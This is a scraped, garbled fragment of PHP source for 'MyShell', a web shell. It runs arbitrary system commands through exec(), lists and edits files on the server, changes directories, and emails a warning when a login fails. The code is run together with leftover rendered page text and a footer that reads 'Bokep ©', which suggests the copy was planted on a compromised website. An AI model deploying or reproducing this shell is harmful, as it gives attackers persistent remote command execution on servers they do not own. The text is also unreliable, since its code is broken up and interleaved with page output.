Access denied

A warning message have been sended to the administrator
$MyShellVersion"; if(isset($PHP_AUTH_USER)){ $warnMsg =" This is $MyShellVersion installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF just to let you know that somebody tryed to access the script using wrong username or password: Date: ".date("Y-m-d H:i:s")." IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]." User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]." username used: $PHP_AUTH_USER password used: $PHP_AUTH_PW If this is not the first time it happens, please consider either to remove MyShell from your system or change it's name or directory location on your server. Regards The MyShell dev team "; mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg, "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System"); } exit; } } //Function that validate directories function validate_dir($dir){ GLOBAL $dirLimit; if($dirLimit){ $cdPos = strpos($dir,$dirLimit); if ((string)$cdPos == "") { $dir = $dirLimit; $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n"; } } return $dir; } // Set working directory. if (isset($work_dir)) { //A workdir has been asked for - we chdir to that dir. $work_dir = validate_dir($work_dir); @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n"); $work_dir = exec("pwd"); } else{ // No work_dir - we chdir to $DOCUMENT_ROOT $work_dir = validate_dir($DOCUMENT_ROOT); chdir($work_dir); $work_dir = exec("pwd"); } //Now we handle files if we are in Edit Mode if($editMode && ($command||$editCancel))$editMode=false; if($editMode){ if($editSave ||$editSaveExit){ if(function_exists(ini_set))ini_set("track_errors","1"); if($fp=@fopen($file,"w")){ if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut); fputs($fp,$shellOut); fclose($fp); $command = $TexEd." ".$file; if($editSaveExit) { $command=""; $shellOutput="MyShell: $file: saved"; $editMode=false; } } else { $command=""; $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes."; $errorSave=true; } } } //Separate command(s) and arguments to analize first command $input=explode(" ",$command); while (list ($key, $val) = each ($voidCommands)) { if($input[0]==$val){ $voidCmd = $input[0]; $input[0]="void"; } } switch($input[0]){ case "cd": $path=$input[1]; if ($path==".."){ $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1)); if ($work_dir == "") $work_dir = "/"; } elseif (substr($path,0,1)=="/")$work_dir=$path; else $work_dir=$work_dir."/".$path; $work_dir = validate_dir($work_dir); @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied"); $work_dir = exec("pwd"); $commandBk = $command; $command = ""; break; case "man": exec($command,$man); if($man){ $codes = ".".chr(8); $manual = implode("\n",$man); $shellOutput = ereg_replace($codes,"",$manual); $commandBk = $command; $command = ""; } else $stderr=1; break; case "cat": exec($command,$cat); if($cat){ $text = implode("\n",$cat); $shellOutput = htmlspecialchars($text); $commandBk = $command; $command = ""; } else $stderr=1; break; case "more": exec($command,$cat); if($cat){ $text = implode("\n",$cat); $shellOutput = htmlspecialchars($text); $commandBk = $command; $command = ""; } else $stderr=1; break; case $TexEd: if(file_exists($input[1])){ exec("cat ".$input[1],$cat); $text = implode("\n",$cat); $shellOutput = htmlspecialchars($text); $fileOwner = posix_getpwuid(fileowner($input[1])); $filePerms = sprintf("%o", (fileperms($input[1])) & 0777); $fileEditInfo = "  :::::::  Owner: ".$fileOwner["name"]." Permissions: $filePerms"; } else $fileEditInfo = "  :::::::  NEW FILE"; $currFile = $input[1]; $editMode = true; $command = ""; break; case "void": $shellOutput = "MyShell: $voidCmd: void command for MyShell"; $commandBk = $command; $command = ""; } //Now we prepare the webpage if(!$oCols)$oCols=$termCols; if(!$oRows)$oRows=$termRows; if($editMode)$focus="shellOut.focus()"; else $focus=""; //WhoamI if(!$whoami)$whoami=exec("whoami"); ?> <?echo $MyShellVersion?> >
Current User: >   :::::::   MyShell file editor File:$work_dir/$currFile $fileEditInfo\n"; } else{ echo "Current working directory: \n"; $work_dir_splitted = explode("/", substr($work_dir, 1)); echo "Root/"; if ($work_dir_splitted[0] == "") { $work_dir = "/"; /* Root directory. */ } else{ for ($i = 0; $i < count($work_dir_splitted); $i++) { $url .= "/".$work_dir_splitted[$i]; echo "$work_dir_splitted[$i]/"; } } } ?>

"; ?>
Command: >        stderr-traping "; if($editMode){ echo "
Save file as: "; } else{ echo "
Working directory: "; } ?>   |  >Echo commands   |  Cols:>  Rows:>  | :::::::::: Bokep ©